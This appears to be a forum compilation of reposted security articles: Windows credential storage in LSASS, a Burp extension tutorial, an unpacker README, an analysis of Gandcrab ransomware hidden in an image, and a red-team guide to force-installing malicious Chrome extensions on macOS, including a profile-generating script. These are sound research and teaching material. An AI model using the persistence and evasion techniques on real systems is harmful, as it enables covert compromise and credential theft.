LSASS can store credentials in multiple forms, including:
- Reversibly encrypted plaintext
- Kerberos tickets (ticket-granting tickets (TGTs), service tickets)
- NT hash
- LAN Manager (LM) hash

If the user logs on to Windows by using a smart card, LSASS does not store a plaintext password, but it stores the corresponding NT hash value for the account and the plaintext PIN for the smart card. If the account attribute requiring a smart card for interactive logon is enabled, a random NT hash value is automatically generated for the account instead of the original password hash. The password hash that is automatically generated when the attribute is set does not change.

If a user logs on to a Windows-based computer with a password that is compatible with LAN Manager (LM) hashes, this authenticator is present in memory. The storage of plaintext credentials in memory cannot be disabled, even if the credential providers that require them are disabled.

The stored credentials are directly associated with the Local Security Authority Subsystem Service (LSASS) logon sessions that have been started after the last restart and have not been closed. For example, LSA sessions with stored LSA credentials are created when a user does any of the following:
- Logs on to a local session or Remote Desktop Protocol (RDP) session on the computer
- Runs a task by using the RunAs option
- Runs an active Windows service on the computer
- Runs a scheduled task or batch job
- Runs a task on the local computer by using a remote administration tool

In some circumstances, the LSA secrets, which are secret pieces of data that are accessible only to SYSTEM account processes, are stored on the hard disk drive. Some of these secrets are credentials that must persist after reboot, and they are stored in encrypted form on the hard disk drive.
Credentials stored as LSA secrets might include:
- Account password for the computer's Active Directory Domain Services (AD DS) account
- Account passwords for Windows services that are configured on the computer
- Account passwords for configured scheduled tasks
- Account passwords for IIS application pools and websites
- Passwords for Microsoft accounts

Introduced in Windows 8.1, the client operating system provides additional protection for the LSA to prevent reading memory and code injection by non-protected processes. This protection increases security for the credentials that the LSA stores and manages. For more information about these additional protections, see Configuring Additional LSA Protection.

Cached credentials and validation

Validation mechanisms rely on the presentation of credentials at the time of logon. However, when the computer is disconnected from a domain controller and the user is presenting domain credentials, Windows uses the process of cached credentials in the validation mechanism. Each time a user logs on to a domain, Windows caches the credentials supplied and stores them in the security hive in the registry of the operating system. With cached credentials, the user can log on to a domain member without being connected to a domain controller within that domain.

Credential storage and validation

It is not always desirable to use one set of credentials for access to different resources. For example, an administrator might want to use administrative rather than user credentials when accessing a remote server. Similarly, if a user accesses external resources, such as a bank account, he or she can only use credentials that are different than their domain credentials. The following sections describe the differences in credential management between current versions of Windows operating systems and the Windows Vista and Windows XP operating systems.

Remote logon credential processes

The Remote Desktop Protocol (RDP) manages the credentials of the user who connects to a remote computer by using the Remote Desktop Client, which was introduced in Windows 8. The credentials in plaintext form are sent to the target host, where the host attempts to perform the authentication process and, if successful, connects the user to allowed resources. RDP does not store the credentials on the client, but the user's domain credentials are stored in the LSASS.

Introduced in Windows Server 2012 R2 and Windows 8.1, Restricted Admin mode provides additional security to remote logon scenarios. This mode of Remote Desktop causes the client application to perform a network logon challenge-response with the NT one-way function (NTOWF) or use a Kerberos service ticket when authenticating to the remote host. After the administrator is authenticated, the administrator does not have the respective account credentials in LSASS because they were not supplied to the remote host. Instead, the administrator has the computer account credentials for the session. Administrator credentials are not supplied to the remote host, so actions are performed as the computer account. Resources are also limited to the computer account, and the administrator cannot access resources with his own account.

Automatic restart sign-on credential process

When a user signs in on a Windows 8.1 device, LSA saves the user credentials in encrypted memory that is accessible only by LSASS.exe. When Windows Update initiates an automatic restart without user presence, these credentials are used to configure Autologon for the user.
On restart, the user is automatically signed in via the Autologon mechanism, and then the computer is additionally locked to protect the user's session. The locking is initiated through Winlogon, whereas the credential management is done by LSA. By automatically signing in and locking the user's session on the console, the user's lock screen applications are restarted and available. For more information about ARSO, see Winlogon Automatic Restart Sign-On (ARSO).

Stored user names and passwords in Windows Vista and Windows XP

In Windows Server 2008, Windows Server 2003, Windows Vista, and Windows XP, Stored User Names and Passwords in Control Panel simplifies the management and use of multiple sets of logon credentials, including X.509 certificates used with smart cards and Windows Live credentials (now called Microsoft account). The credentials - part of the user's profile - are stored until needed. This action can increase security on a per-resource basis by ensuring that if one password is compromised, it does not compromise all security.

After a user logs on and attempts to access additional password-protected resources, such as a share on a server, and if the user's default logon credentials are not sufficient to gain access, Stored User Names and Passwords is queried. If alternate credentials with the correct logon information have been saved in Stored User Names and Passwords, these credentials are used to gain access. Otherwise, the user is prompted to supply new credentials, which can then be saved for reuse, either later in the logon session or during a subsequent session.

The following restrictions apply:

If Stored User Names and Passwords contains invalid or incorrect credentials for a specific resource, access to the resource is denied, and the Stored User Names and Passwords dialog box does not appear.
Stored User Names and Passwords stores credentials only for NTLM, Kerberos protocol, Microsoft account (formerly Windows Live ID), and Secure Sockets Layer (SSL) authentication. Some versions of Internet Explorer maintain their own cache for basic authentication.

These credentials become an encrypted part of a user's local profile in the \Documents and Settings\Username\Application Data\Microsoft\Credentials directory. As a result, these credentials can roam with the user if the user's network policy supports Roaming User Profiles. However, if the user has copies of Stored User Names and Passwords on two different computers and changes the credentials that are associated with the resource on one of these computers, the change is not propagated to Stored User Names and Passwords on the second computer.

Windows Vault and Credential Manager

Credential Manager was introduced in Windows Server 2008 R2 and Windows 7 as a Control Panel feature to store and manage user names and passwords. Credential Manager lets users store credentials relevant to other systems and websites in the secure Windows Vault. Some versions of Internet Explorer use this feature for authentication to websites.

Credential management by using Credential Manager is controlled by the user on the local computer. Users can save and store credentials from supported browsers and Windows applications to make it convenient when they need to sign in to these resources. Credentials are saved in special encrypted folders on the computer under the user's profile.
Applications that support this feature (through the use of the Credential Manager APIs), such as web browsers and apps, can present the correct credentials to other computers and websites during the logon process. When a website, an application, or another computer requests authentication through NTLM or the Kerberos protocol, a dialog box appears in which you select the Update Default Credentials or Save Password check box. This dialog box that lets a user save credentials locally is generated by an application that supports the Credential Manager APIs. If the user selects the Save Password check box, Credential Manager keeps track of the user's user name, password, and related information for the authentication service that is in use. The next time the service is used, Credential Manager automatically supplies the credential that is stored in the Windows Vault. If it is not accepted, the user is prompted for the correct access information. If access is granted with the new credentials, Credential Manager overwrites the previous credential with the new one and then stores the new credential in the Windows Vault. Security Accounts Manager database The Security Accounts Manager (SAM) is a database that stores local user accounts and groups. It is present in every Windows operating system; however, when a computer is joined to a domain, Active Directory manages domain accounts in Active Directory domains. For example, client computers running a Windows operating system participate in a network domain by communicating with a domain controller even when no human user is logged on. To initiate communications, the computer must have an active account in the domain. Before accepting communications from the computer, the LSA on the domain controller authenticates the computer's identity and then constructs the computer's security context just as it does for a human security principal. This security context defines the identity and capabilities of a user or service on a particular computer or a user, service, or computer on a network. For example, the access token contained within the security context defines the resources (such as a file share or printer) that can be accessed and the actions (such as Read, Write, or Modify) that can be performed by that principal - a user, computer, or service on that resource. The security context of a user or computer can vary from one computer to another, such as when a user logs on to a server or a workstation other than the user's own primary workstation. It can also vary from one session to another, such as when an administrator modifies the user's rights and permissions. In addition, the security context is usually different when a user or computer is operating on a stand-alone basis, in a network, or as part of an Active Directory domain. Local domains and trusted domains When a trust exists between two domains, the authentication mechanisms for each domain rely on the validity of the authentications coming from the other domain. Trusts help to provide controlled access to shared resources in a resource domain (the trusting domain) by verifying that incoming authentication requests come from a trusted authority (the trusted domain). In this way, trusts act as bridges that let only validated authentication requests travel between domains. How a specific trust passes authentication requests depends on how it is configured. 
Trust relationships can be one-way, by providing access from the trusted domain to resources in the trusting domain, or two-way, by providing access from each domain to resources in the other domain. Trusts are also either nontransitive, in which case a trust exists only between the two trust partner domains, or transitive, in which case a trust automatically extends to any other domains that either of the partners trusts. For information about domain and forest trust relationships regarding authentication, see Delegated Authentication and Trust Relationships. Certificates in Windows authentication A public key infrastructure (PKI) is the combination of software, encryption technologies, processes, and services that enable an organization to secure its communications and business transactions. The ability of a PKI to secure communications and business transactions is based on the exchange of digital certificates between authenticated users and trusted resources. A digital certificate is an electronic document that contains information about the entity it belongs to, the entity it was issued by, a unique serial number or some other unique identification, issuance and expiration dates, and a digital fingerprint. Authentication is the process of determining if a remote host can be trusted. To establish its trustworthiness, the remote host must provide an acceptable authentication certificate. Remote hosts establish their trustworthiness by obtaining a certificate from a certification authority (CA). The CA can, in turn, have certification from a higher authority, which creates a chain of trust. To determine whether a certificate is trustworthy, an application must determine the identity of the root CA, and then determine if it is trustworthy. Similarly, the remote host or local computer must determine if the certificate presented by the user or application is authentic. The certificate presented by the user through the LSA and SSPI is evaluated for authenticity on the local computer for local logon, on the network, or on the domain through the certificate stores in Active Directory. To produce a certificate, authentication data passes through hash algorithms, such as Secure Hash Algorithm 1 (SHA1), to produce a message digest. The message digest is then digitally signed by using the sender's private key to prove that the message digest was produced by the sender. Note SHA1 is the default in Windows 7 and Windows Vista, but was changed to SHA2 in Windows 8. Smart card authentication Smart card technology is an example of certificate-based authentication. Logging on to a network with a smart card provides a strong form of authentication because it uses cryptography-based identification and proof of possession when authenticating a user to a domain. Active Directory Certificate Services (AD CS) provides the cryptographic-based identification through the issuance of a logon certificate for each smart card. For information about smart card authentication, see the Windows Smart Card Technical Reference. Virtual smart card technology was introduced in Windows 8. It stores the smart card's certificate in the PC, and then protects it by using the device's tamper-proof Trusted Platform Module (TPM) security chip. In this way, the PC actually becomes the smart card which must receive the user's PIN in order to be authenticated. Remote and wireless authentication Remote and wireless network authentication is another technology that uses certificates for authentication. 
The Internet Authentication Service (IAS) and virtual private network servers use Extensible Authentication Protocol-Transport Level Security (EAP-TLS), Protected Extensible Authentication Protocol (PEAP), or Internet Protocol security (IPsec) to perform certificate-based authentication for many types of network access, including virtual private network (VPN) and wireless connections. For information about certificate-based authentication in networking, see Network access authentication and certificates. Sursa: https://docs.microsoft.com/en-us/windows-server/security/windows-authentication/credentials-processes-in-windows-authentication
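As a concrete illustration of one credential form described above: an NT hash is simply an MD4 digest of the UTF-16LE-encoded password. A minimal Python sketch (this assumes your Python's OpenSSL build still exposes the legacy MD4 algorithm, which newer builds may disable):

import hashlib

def nt_hash(password):
    # NT hash = MD4 over the UTF-16LE encoding of the password.
    # It is neither salted nor iterated, which is why hashes read
    # from LSASS memory are so valuable to an attacker.
    return hashlib.new("md4", password.encode("utf-16-le")).hexdigest()

print(nt_hash("password"))  # 8846f7eaee8fb117ad06bdd830b7586c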
17. February 7, 2019 Jake

Burp Extension Python Tutorial – Encode/Decode/Hash

This post provides step by step instructions for writing a Burp extension using Python. This is different from my previous extension writing tutorial, where we only worked in the message tab, and I will be moving a bit more quickly than in that post. Here is what this post will cover:

Importing required modules and accessing the Burp API
Creating a tab for the extension
Writing the GUI text fields and buttons
Writing functions that occur when you click the buttons

This extension will have its own tab and GUI components, not to mention will be a little more useful than the extension written previously. Here is what we are going to be making:

This is inspired from a tool of the same name included in OWASP's ZAP. Let's get started.

Setup

Create a folder where you'll store your extensions – I named mine extensions
Download the Jython standalone JAR file – Place into the extensions folder
Download exceptions_fix.py to the extensions folder – this will make debugging easier
Configure Burp to use Jython – Extender > Options > Python Environment > Select file
Create a new file (encodeDecodeHash.py) in your favorite text editor (save it in your extensions folder)

Importing required modules and accessing the Extender API, and implementing the debugger

Let's write some code:

from burp import IBurpExtender, ITab
from javax import swing
from java.awt import BorderLayout
import sys

try:
    from exceptions_fix import FixBurpExceptions
except ImportError:
    pass

The IBurpExtender module is required for all extensions, while ITab will register the tab in Burp and send Burp the UI that we will define. The swing library is what is used to build GUI applications with Jython, and we'll be using layout management, specifically BorderLayout from the java.awt library. The sys module is imported to allow Python errors to be shown in stdout with the help of the FixBurpExceptions script. I placed that in a Try/Except block so if we don't have the script the code will still work fine. I'll be adding more imports when we start writing the encoding methods, but this is enough for now.

This next code snippet will register our extension and create a new tab that will contain the UI. If you're following along, type or paste this code after the imports:

class BurpExtender(IBurpExtender, ITab):
    def registerExtenderCallbacks(self, callbacks):

        # Required for easier debugging:
        # https://github.com/securityMB/burp-exceptions
        sys.stdout = callbacks.getStdout()

        # Keep a reference to our callbacks object
        self.callbacks = callbacks

        # Set our extension name
        self.callbacks.setExtensionName("Encode/Decode/Hash")

        # Create the tab
        self.tab = swing.JPanel(BorderLayout())

        # Add the custom tab to Burp's UI
        callbacks.addSuiteTab(self)
        return

    # Implement ITab
    def getTabCaption(self):
        """Return the text to be displayed on the tab"""
        return "Encode/Decode/Hash"

    def getUiComponent(self):
        """Passes the UI to burp"""
        return self.tab

try:
    FixBurpExceptions()
except:
    pass

This class implements IBurpExtender, which is required for all extensions and must be called BurpExtender. Within the required method, registerExtenderCallbacks, the line self.callbacks keeps a reference to Burp so we can interact with it, and in our case will be used to create the tab in Burp. ITab requires two methods, getTabCaption and getUiComponent, where getTabCaption returns the name of the tab, and getUiComponent returns the UI itself (self.tab), which is created in the line self.tab = swing.JPanel(BorderLayout()).
FixBurpExceptions is called at the end of the script just in case we have an error (Thanks @SecurityMB!). Save the script to your extensions folder and then load the file into Burp: Extender > Extensions > Add > Extension Details > Extension Type: Python > Select file… > encodeDecodeHash.py. The extension should load and you should have a new tab:

This tab doesn't have any features yet, so let's build the skeleton of the UI. Before I go into the code, I'll model out the GUI so that it will hopefully make a little more sense. There are different layout managers that you can use in Java, and I chose to use BorderLayout in the main tab, so when I place panels on the tab, I can specify that they should go in relative positions, such as North or Center. Within the two panels I created boxes that contain other boxes. I did this so that text areas and labels would appear on different lines, but stay in the general area that I wanted them to. There are probably better ways to do this, but here is the model:

Onto the code:

class BurpExtender(IBurpExtender, ITab):
    ...
        self.tab = swing.JPanel(BorderLayout())

        # Create the text area at the top of the tab
        textPanel = swing.JPanel()

        # Create the label for the text area
        boxVertical = swing.Box.createVerticalBox()
        boxHorizontal = swing.Box.createHorizontalBox()
        textLabel = swing.JLabel("Text to be encoded/decoded/hashed")
        boxHorizontal.add(textLabel)
        boxVertical.add(boxHorizontal)

        # Create the text area itself
        boxHorizontal = swing.Box.createHorizontalBox()
        self.textArea = swing.JTextArea('', 6, 100)
        self.textArea.setLineWrap(True)
        boxHorizontal.add(self.textArea)
        boxVertical.add(boxHorizontal)

        # Add the text label and area to the text panel
        textPanel.add(boxVertical)

        # Add the text panel to the top of the main tab
        self.tab.add(textPanel, BorderLayout.NORTH)

        # Add the custom tab to Burp's UI
        callbacks.addSuiteTab(self)
        return
    ...

A bit of explanation. The code (textPanel = swing.JPanel()) creates a new panel that will contain the text label and text area. Then, a box is created (boxVertical), that will be used to hold other boxes (boxHorizontal) that contain the text label and area. The horizontal boxes get added to the vertical box (boxVertical.add(boxHorizontal)), the vertical box is added to the panel we created (textPanel.add(boxVertical)), and that panel is added to the main tab panel at the top (BorderLayout.NORTH). Save the code, unload/reload the extension and this is what you should see:

Now we'll add the tabs:

        self.tab.add(textPanel, BorderLayout.NORTH)

        # Create a tabbed pane to go in the center of the
        # main tab, below the text area
        tabbedPane = swing.JTabbedPane()
        self.tab.add("Center", tabbedPane)

        # First tab
        firstTab = swing.JPanel()
        firstTab.layout = BorderLayout()
        tabbedPane.addTab("Encode", firstTab)

        # Second tab
        secondTab = swing.JPanel()
        secondTab.layout = BorderLayout()
        tabbedPane.addTab("Decode", secondTab)

        # Third tab
        thirdTab = swing.JPanel()
        thirdTab.layout = BorderLayout()
        tabbedPane.addTab("Hash", thirdTab)

        # Add the custom tab to Burp's UI
        callbacks.addSuiteTab(self)
        return
    ...

After you add this code and save the file, you should have your tabs:

To keep this post short, we're only going to build out the Encode tab, but the steps will be the same for each tab.
        # First tab
        firstTab = swing.JPanel()
        firstTab.layout = BorderLayout()
        tabbedPane.addTab("Encode", firstTab)

        # Button for first tab
        buttonPanel = swing.JPanel()
        buttonPanel.add(swing.JButton('Encode', actionPerformed=self.encode))
        firstTab.add(buttonPanel, "North")

        # Panel for the encoders. Each label and text field
        # will go in horizontal boxes which will then go in
        # a vertical box
        encPanel = swing.JPanel()
        boxVertical = swing.Box.createVerticalBox()

        boxHorizontal = swing.Box.createHorizontalBox()
        self.b64EncField = swing.JTextField('', 75)
        boxHorizontal.add(swing.JLabel("  Base64    :"))
        boxHorizontal.add(self.b64EncField)
        boxVertical.add(boxHorizontal)

        boxHorizontal = swing.Box.createHorizontalBox()
        self.urlEncField = swing.JTextField('', 75)
        boxHorizontal.add(swing.JLabel("  URL       :"))
        boxHorizontal.add(self.urlEncField)
        boxVertical.add(boxHorizontal)

        boxHorizontal = swing.Box.createHorizontalBox()
        self.asciiHexEncField = swing.JTextField('', 75)
        boxHorizontal.add(swing.JLabel("  Ascii Hex :"))
        boxHorizontal.add(self.asciiHexEncField)
        boxVertical.add(boxHorizontal)

        boxHorizontal = swing.Box.createHorizontalBox()
        self.htmlEncField = swing.JTextField('', 75)
        boxHorizontal.add(swing.JLabel("  HTML      :"))
        boxHorizontal.add(self.htmlEncField)
        boxVertical.add(boxHorizontal)

        boxHorizontal = swing.Box.createHorizontalBox()
        self.jsEncField = swing.JTextField('', 75)
        boxHorizontal.add(swing.JLabel("  JavaScript:"))
        boxHorizontal.add(self.jsEncField)
        boxVertical.add(boxHorizontal)

        # Add the vertical box to the Encode tab
        firstTab.add(boxVertical, "Center")

        # Second tab
        ...

        # Third tab
        ...

        # Add the custom tab to Burp's UI
        callbacks.addSuiteTab(self)
        return

    # Implement the functions from the button clicks
    def encode(self, event):
        pass

    # Implement ITab
    def getTabCaption(self):
    ...

First we create a panel (buttonPanel) to hold our button, and then we add a button to the panel and specify the argument actionPerformed=self.encode, where self.encode is a method that will run when the button is clicked. We define encode at the end of the code snippet, and currently have it doing nothing. We'll implement the encoders later. Now that our panel has a button, we add that panel to the first tab (firstTab.add(buttonPanel, "North")). Next we create a separate panel for the encoder text labels and fields. Similar to before, we create a big box (boxVertical), and then create a horizontal box (boxHorizontal) for each pair of labels/textfields, which then get added to the big box. Finally that big box gets added to the tab. After saving the file and unloading/reloading, this is what the program should look like:

The button might not seem to do anything, but it is actually executing the encode method we defined (which does nothing). Let's fix that method and have it encode the user input:

...
try:
    from exceptions_fix import FixBurpExceptions
except ImportError:
    pass
import base64
import urllib
import binascii
import cgi
import json
...

        # Add the custom tab to Burp's UI
        callbacks.addSuiteTab(self)
        return

    # Implement the functions from the button clicks
    def encode(self, event):
        """Encodes the user input and writes the encoded
        value to text fields.
        """
        self.b64EncField.text = base64.b64encode(self.textArea.text)
        self.urlEncField.text = urllib.quote(self.textArea.text)
        self.asciiHexEncField.text = binascii.hexlify(self.textArea.text)
        self.htmlEncField.text = cgi.escape(self.textArea.text)
        self.jsEncField.text = json.dumps(self.textArea.text)

    # Implement ITab
    def getTabCaption(self):
    ...

The encode method sets the text on the encode fields we created by encoding whatever the user types in the top text area (self.textArea.text). Once you save and unload/reload the file you should have full encoding functionality.

And that's it! The process is the same for the other tabs, and if you're interested in the whole extension, it is available on my GitHub. Hopefully this post makes developing your own extensions a little easier. It was definitely a good learning experience for me. Feedback is welcome.

Sursa: https://laconicwolf.com/2019/02/07/burp-extension-python-tutorial-encode-decode-hash/
18. Un{i}packer

Unpacking PE files using Unicorn Engine

The usage of runtime packers by malware authors is very common, as it is a technique that helps to hinder analysis. Furthermore, packers are a challenge for antivirus products, as they make it impossible to identify malware by signatures or hashes alone.

In order to be able to analyze a packed malware sample, it is often required to unpack the binary. Usually this means that the analyst will have to manually unpack the binary by using dynamic analysis techniques (tools: OllyDbg, x64Dbg). There are also some approaches for automatic unpacking, but they are all only available for Windows. Therefore, when targeting a packed Windows malware, the analyst will require a Windows machine. The goal of our project is to enable platform independent automatic unpacking by using emulation.

Supported packers:

UPX: Cross-platform, open source packer
ASPack: Advanced commercial packer with a high compression ratio
PEtite: Freeware packer, similar to ASPack
FSG: Freeware, fast to unpack

Usage:

1. Install r2 and YARA
2. pip3 install -r requirements.txt
3. python3 unipacker.py

For detailed instructions on how to use Un{i}packer please refer to the Wiki. Additionally, all of the shell commands are documented. To access this information, use the help command.

Sursa: https://github.com/unipacker/unipacker
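To get a feel for the emulation approach Un{i}packer builds on, here is a minimal, self-contained Unicorn Engine example (not Un{i}packer's own code) that maps a single x86 instruction into emulated memory and executes it:

from unicorn import Uc, UC_ARCH_X86, UC_MODE_32
from unicorn.x86_const import UC_X86_REG_ECX

CODE = b"\x41"  # INC ECX
BASE = 0x1000

mu = Uc(UC_ARCH_X86, UC_MODE_32)    # 32-bit x86 emulator
mu.mem_map(BASE, 0x1000)            # map one page of emulated memory
mu.mem_write(BASE, CODE)            # place the code in it
mu.reg_write(UC_X86_REG_ECX, 1)
mu.emu_start(BASE, BASE + len(CODE))
print(mu.reg_read(UC_X86_REG_ECX))  # prints 2

An unpacker applies the same idea at scale: emulate the packer's stub until the original entry point is reached, then dump the unpacked image out of emulated memory.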
  19. Super Mario Oddity A few days ago, I was investigating a sample piece of malware where our static analysis flagged a spreadsheet as containing a Trojan but the behavioural trace showed very little happening. This is quite common for various reasons, but one of the quirks of how we work at Bromium is that we care about getting malware to run and fully detonate within our secure containers. This enables our customers to understand the threats they are facing, and to take any other remedial action necessary without any risk to their endpoints or company assets. Running their malware actually makes our customers more secure. A quick look at the macros in this spreadsheet revealed that it was coded to exit Excel immediately if the machine was not based in Italy (country 39): We often see malware samples failing to run based on location, but usually they look for signs of being in Russia. This is widely believed to help groups based there avoid prosecution by local authorities, but of course leads to false-flag usage too. My interest was piqued, so I modified the document to remove this check so it would open and then I could see if we could get the malware to detonate. The usual social engineering prompt is displayed on opening: Roughly translated as ‘It’s not possible to view the preview online. To view the content, you need to click on “enable edit” and “enable content”’. After modifying the spreadsheet, the malware detonates inside one of our containers. We see the usual macro-based launch of cmd.exe and PowerShell with obfuscated arguments. This is very run-of-the-mill, but these arguments stood out as not being from one of the usual obfuscators we see, so I was determined to dig a bit deeper: (truncated very early) As a side note, malware authors actually spend quite a lot of effort on marketing, including often mentioning specific researchers by name within samples. This happens because of the nature of modern Platform Criminality – malware is licensed to affiliates for distribution, and in order to attract the most interest and best prices malware authors need to make a name for themselves. It’s not clear whether or not this sample was actually trying to encourage me to investigate or not, but sometimes huge clues like this are put into samples on purpose. The binary strings are just a list of encoded characters, so this was easily reconstructed to the following code, which looks like PowerShell: At this point, things seemed particularly interesting. My PowerShell skills are basic, but it looks like this sample is trying to download an image and extract some data from the pixel values. There was only one person to turn to – our PowerShell evangelist and polymath Tim Howes, who was also intrigued. Meanwhile, I pulled the images, with each looking roughly like this: (I’ve slightly resized and blurred). Steganographic techniques such as using the low-bits from pixel values are clearly not new, but it’s rare that we see this kind of thing in malspam; even at Bromium, where we normally see slightly more advanced malware that evaded the rest of the endpoint security stack. It’s also pretty hard to defend against this kind of traffic at the firewall. Now over to Tim to make sense of the PowerShell plumbing. A manual re-shuffle to de-obfuscate the code and you can see more clearly the bitwise operation on the blue and green pixels. 
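To make the extraction step concrete, here is a small Python sketch of the general technique using Pillow. The region, channel order, and nibble packing here are illustrative assumptions, not the sample's exact parameters:

from PIL import Image

img = Image.open("mario.png").convert("RGB")

data = bytearray()
for x in range(200):                # a small region at the top of the image
    r, g, b = img.getpixel((x, 0))
    # pack the low 4 bits of blue and the low 4 bits of green into one byte
    data.append(((b & 0x0F) << 4) | (g & 0x0F))

print(bytes(data[:16]))             # first recovered payload bytes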
Since only the lower 4 bits of blue and green have been used, this won’t make a big difference to the image when looked at by a human, but it is quite trivial to hide some code within. Recasting the above code to a different form makes slightly more sense of where in the image we’re extracting from: This equates to the area in blue at the top of the image here: The above code is finding the next level of code from the blue and green channel from pixels in a small region of the image. The lower bits of each pixel are used as adjustments to these and yield minimal differences to the perceived image. Running this presents yet more heavily obfuscated PowerShell: We can work through this by noticing that there is another large string (base64 encoded) sliced/diced into 40 parts. This can be reassembled: Looking at the above, we see they are using a .net decompressor; so employing our own local variables to step through each part yields: This gives a resultant stream of yet more PowerShell: We execute the “-split” operations on the large string and then convert to a string: We now see that $str is still more mildly obfuscated PowerShell: There’s another slice/dice to form “iex” (the alias for invoke-expression in PowerShell): ($env:comspec)[4,15,25] == 'iex'. The manually de-obfuscated PowerShell reveals the final level which is dropping and executing from a site, but only if the output of ‘get-culture’ on the machine matches “ita” (for example if the culture is Italian, which matches the earlier targeting attempts). Thanks Tim! We downloaded the samples from the above, including from an Italy-based VPN and were given various samples of Gandcrab ransomware. Gandcrab has seen phenomenal success last year, initially being distributed by exploit kits and becoming especially prevalent in the Far East. I am generally skeptical of malware attribution claims, and the implications of so much obfuscated code hidden within a picture of Mario and checking for an Italian victim are not obvious; for all we know the fictional Wario may be as likely to be responsible as any geopolitical actor. However, a future avenue for investigation here is to examine the encoded affiliate IDs, and compare against samples we have collected from other sources to see if there are patterns for whom this affiliate is targeting. Another key forensic advantage that we have at Bromium is that we partition our isolation at the granularity of a user task (in this instance, the opening of a piece of malspam from an email). This means we can associate each sample with lots of forensic metadata about the task the user was performing, simply because they are from the same container. Mining our set of Gandcrab samples to track the behaviour of their affiliates is definitely a task for another day. Whether or not they are based in a targeted country, our users can open malicious emails safely and transparently with Bromium as our hardware-enforced containers securely isolate the malware from the host system (our princess is in another castle). 
IOCs: Original Spreadsheet: 3849381059d9e8bbcc59c253d2cbe1c92f7e1f1992b752d396e349892f2bb0e7 Mario image: 2726cd6796774521d03a5f949e10707424800882955686c886d944d2b2a61e0 Other Mario image: 0c8c27f06a0acb976b8f12ff6749497d4ce1f7a98c2a161b0a9eb956e6955362 Ultimate EXEs: ec2a7e8da04bc4e60652d6f7cc2d41ec68ff900d39fc244cc3b5a29c42acb7a4 630b6f15c770716268c539c5558152168004657beee740e73ee9966d6de1753f February 8, 2019 • Category: Threats • By: Matthew Rowen Sursa: https://www.bromium.com/gandcrab-ransomware-code-hiding-in-image/
20. No Place Like Chrome

Christopher Ross
Feb 8

Chrome extensions were first introduced to the public in December of 2009 and use HTML, JavaScript, and CSS to extend Chrome's functionality. Extensions can leverage the Chrome API to block ads, change the browser UI, manage cookies, and even work in conjunction with desktop applications. They're also restricted by a finite set of permissions that are granted by the user during the installation process. With a rich set of native APIs, Chrome extensions provide a more than adequate alternative for hiding malicious code. With the emergence of EDR products and new security features for macOS and Windows 10, endpoint security has improved. However, there has been a lack of detection capabilities for the use of malicious Chrome extensions on macOS. As a result, they have become an enticing initial access and persistence payload. This post will cover a payload delivery mechanism for extensions on macOS, leveraging the auto update feature for offensive purposes, a practical example using Apfell, and some basic, but actionable detection guidance.

Payload Delivery

There are a few methods that can be used to legitimately install extensions on macOS. Google forces developers to distribute extensions through the web store. Recently, Google changed their policy so that extensions cannot be installed from third party sites. Adversaries may still host extensions on the web store anyway, but it was a necessary policy change. Alternatively, extensions can be installed on macOS with the use of mobile configuration profiles. Configuration profiles are used on macOS and iOS to manage various settings, including power management, DNS servers, login items, WiFi settings, wallpaper, and even applications like Google Chrome. End-users can install profiles by double-clicking on the file or on the command line with the profiles command. Mobile configuration profiles are XML-formatted and follow a relatively simple format. To create a mobile configuration profile, a payload uuid, application ID, and update url (this will be covered later) are required. For more information on configuration profiles, please refer to this article and this reference. Here is an example that can be used as a template.

The ExtensionInstallSources key specifies the URL in which extensions can be installed from. Wildcards can be used in the protocol, host, and URI fields. The ExtensionInstallForceList value refers to a list of extensions that will be installed without the users' consent and cannot be uninstalled. The PayloadRemovalDisallowed key prevents non-admin users from uninstalling the profile. For other keys that can be used to manage extensions and other Google Chrome settings in general, please refer to this. Configuration profiles can be utilized to manage a myriad of settings for macOS and warrant further investigation for additional offensive use cases.

An interesting note about configuration profiles: they can be delivered via email and subsequently, the end-user will not see any prompts from Gatekeeper, macOS's code signing enforcement and verification tool. However, the user will be prompted to confirm the installation of a profile.

Figure 1

If the profile is unsigned, the end-user will be presented with a second prompt (figure 2) before being prompted for admin credentials.

Figure 2

However, when installing a signed profile, the OS will only prompt once for the install and then admin credentials.
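To see how little is needed, here is a hedged Python sketch that generates such a profile with the standard library's plistlib. The identifiers, extension ID, and domain are made-up placeholders, and the article's template above remains the authoritative reference for the exact keys:

import plistlib
import uuid

profile = {
    "PayloadType": "Configuration",
    "PayloadVersion": 1,
    "PayloadUUID": str(uuid.uuid4()),
    "PayloadIdentifier": "com.example.chrome-settings",   # placeholder
    "PayloadDisplayName": "Chrome Settings",
    "PayloadRemovalDisallowed": True,
    "PayloadContent": [{
        "PayloadType": "com.google.Chrome",
        "PayloadVersion": 1,
        "PayloadUUID": str(uuid.uuid4()),
        "PayloadIdentifier": "com.example.chrome-settings.policy",
        "ExtensionInstallSources": ["https://update.example.com/*"],
        # each entry: "<32-char app id>;<update manifest URL>"
        "ExtensionInstallForcelist": [
            "aaaabbbbccccddddeeeeffffgggghhhh;https://update.example.com/update.xml"
        ],
    }],
}

# write the profile; signing it (e.g. with the security CLI) avoids
# the extra "unsigned" prompt described above
with open("chrome.mobileconfig", "wb") as f:
    plistlib.dump(profile, f)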
After the installation, the profile contents can be seen in the Profiles preference pane. If the profile is unsigned, that will be noted in red.

Figure 3

Now that the extension policy has been set for Chrome, when the application is opened, it will make a series of web requests to the update URL specified in the profile. The update URL should point to an update manifest file that specifies the application ID and the URL for the extension file (.crx). Refer to the auto update documentation for an example manifest file. Next, Chrome will download the extension and save it to ~/Library/Application Support/Google/Chrome/Default/Extensions/APPID. At this point, the extension is loaded into the browser and executed. Note that during this entire process, the configuration profile is the only component that requires user interaction.

Similarly, on Windows, an extension can be silently installed by modifying registry keys noted here. However, if the installation source is a third party site, Chrome will only allow inline installs. This type of install requires users to browse to your site and then redirects them to the Chrome web store to complete the installation.

Auto-Update FTW

In order to easily manage bug fixes and security patches, extensions can be automatically updated. When hosting extensions in the Chrome Web Store, Google handles updating your extension. Just upload a new copy of your extension and after a few hours, the browser will update the extension via the web store. For extensions hosted outside the web store, developers have more control. Chrome uses the update url in the manifest.json file to periodically check for updates. During this process, Chrome will read the update manifest file and compare the version in the manifest with the current version of the extension. If the manifest version is higher, the browser will download the newest version of the extension and install it. For an example update manifest, please go here. The update manifest is an XML formatted file that contains the APPID and a URL that points to the .crx file.

